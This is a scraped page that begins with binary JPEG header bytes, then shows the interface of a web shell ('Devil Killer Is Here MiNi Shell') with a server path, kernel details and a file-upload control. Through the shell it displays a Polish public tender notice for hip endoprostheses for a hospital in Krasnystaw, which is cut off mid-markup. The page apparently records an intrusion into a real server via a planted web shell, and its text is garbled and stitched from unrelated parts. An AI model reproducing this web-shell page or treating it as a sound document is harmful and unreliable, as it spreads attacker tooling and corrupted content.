JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240802/0044254601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa endoprotez stawu biodrowego, cementu i mieszalników dla SPZOZ w Krasnymstawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110196699</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marka Sobieskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krasnystaw</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spzozkrasnystaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzozkrasnystaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa endoprotez stawu biodrowego, cementu i mieszalników dla SPZOZ w Krasnymstawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-455010bd-7891-4393-878c-ad1f4dd28e9f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00442546</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00053393/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Dostawa endoprotez stawu biodrowego oraz cementów wraz z mieszalnikami</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://spzozkrasnystaw.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się drogą <br/>elektroniczną za pośrednictwem Platformy e-Zamawiający znajdującej się pod adresem https://spzozkrasnystaw.ezamawiajacy.pl oraz poczty elektronicznej: zamowienia@spzozkrasnystaw.pl<br/>2.	W korespondencji kierowanej do Zamawiającego, Wykonawca powinien posługiwać się numerem sprawy ZP/230-16/2024</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji (innych niż oferta) <br/>przekazywanych na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia na Platformie. <br/>4.	Ogólne zasady korzystania z Platformy:<br/>1)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie lub https://oneplace.marketplanet.pl<br/>2)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub <br/>do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu <br/>rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod <br/>z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>3)	rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający <br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>4)	po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, <br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej w zakładce <br/>&#34;Pytania i odpowiedzi&#34;. Za datę przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do Systemu.<br/>5.	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami <br/>korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania <br/>teleinformatycznego Platforma zakupowa Tel. +48 22 257 22 23, e-mail: <br/>oneplace.admin@marketplanet.pl.<br/>6.	Zamawiający zgodnie z § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452 – zwane dalej <br/>„Rozporządzeniem”) określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>1)	dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PadES;<br/>2)	dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. <br/>7.	Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia określa niezbędne wymagania sprzętowo - <br/>aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: <br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2 GB Ram, procesor <br/>Intel IV 2 GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, <br/>lub ich nowsze wersje; <br/>c)	zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; <br/>d)	włączona obsługa JavaScript; <br/>e)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. <br/>8.	Zamawiający zgodnie z §11 ust. 2 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>9.	Zamawiający zgodnie z § 11 ust. 2 ww. Rozporządzenia określa informacje na temat kodowania <br/>i czasu (...)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana/Państwa danych osobowych jest Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie; Szpital powołał Inspektora Ochrony Danych, z którym może się Pani/Pan/Państwo skontaktować w przypadku jakichkolwiek pytań lub uwag dotyczących przetwarzania Pani/Pana/Państwa danych osobowych oraz przysługujących Pani/Panu/Państwu uprawnień wynikających z RODO. Dane kontaktowe: adres e-mail: daneosobowe@spzozkrasnystaw.pl Pani/Pana/Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. Dostawa endoprotez stawu biodrowego, cementu i mieszalników dla SP ZOZ w Krasnymstawie (ZP/230-16/2024) prowadzonym w trybie podstawowym<br/>2)	odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 2185 ze zm.), dalej „ustawa Pzp”; <br/>3)	Pani/Pana/Państwa dane osobowe będą przechowywane, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>4)	Podanie przez Panią/Pana/Państwa danych osobowych ma charakter dobrowolny przy czym podanie przez Panią/Pana/Państwa danych osobowych bezpośrednio Pani/Pana/Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>5)	w odniesieniu do Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO, w tym nie będą podlegały profilowaniu;<br/>6)	posiada Pani/Pan/Państwo:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana/Państwa dotyczących, w tym prawo do uzyskania kopii tych danych;<br/>−	na podstawie art. 16 RODO prawo do sprostowania (poprawiania) Pani/Pana/Państwa danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych <br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pa-ni/Pan/Państwo, <br/>że przetwarzanie danych osobowych Pani/Pana/Państwa dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana/Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>*** Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/230-16/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183200-8 - Protezy ortopedyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33183100-7 - Implanty ortopedyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/>	<br/><br/>1.1 Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60,00) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie <br/>ze wzorem:<br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00 <br/> cena oferty badanej<br/><br/>1.2. Kryterium „Termin realizacji dostaw częściowych” – 20 pkt <br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów (20,00) otrzyma oferta, która zaoferuje najkrótszy termin realizacji dostaw. Maksymalny termin realizacji dostaw nie może być dłuższy niż 6 dni roboczych od otrzymania zgłoszenia. Oferty uzyskają następującą liczbę punktów:<br/>do 2 dni roboczych – 20,00 pkt<br/>3 dni robocze – 15,00 pkt <br/>4 dni robocze – 10,00 pkt<br/>5 dni robocze – 5,00 pkt <br/>6 dni robocze – 0,00 pkt <br/>Oferta Wykonawcy, który zaoferuje termin realizacji dostaw dłuższy niż 6 dni roboczych zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. kryterium „Termin rozpatrzenia reklamacji jakościowej” – 20 pkt<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/>za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183200-8 - Protezy ortopedyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33183100-7 - Implanty ortopedyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/>	<br/><br/>1.1 Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60,00) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie <br/>ze wzorem:<br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00 <br/> cena oferty badanej<br/><br/>1.2. Kryterium „Termin realizacji dostaw częściowych” – 20 pkt <br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów (20,00) otrzyma oferta, która zaoferuje najkrótszy termin realizacji dostaw. Maksymalny termin realizacji dostaw nie może być dłuższy niż 6 dni roboczych od otrzymania zgłoszenia. Oferty uzyskają następującą liczbę punktów:<br/>do 2 dni roboczych – 20,00 pkt<br/>3 dni robocze – 15,00 pkt <br/>4 dni robocze – 10,00 pkt<br/>5 dni robocze – 5,00 pkt <br/>6 dni robocze – 0,00 pkt <br/>Oferta Wykonawcy, który zaoferuje termin realizacji dostaw dłuższy niż 6 dni roboczych zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. kryterium „Termin rozpatrzenia reklamacji jakościowej” – 20 pkt<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/>za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 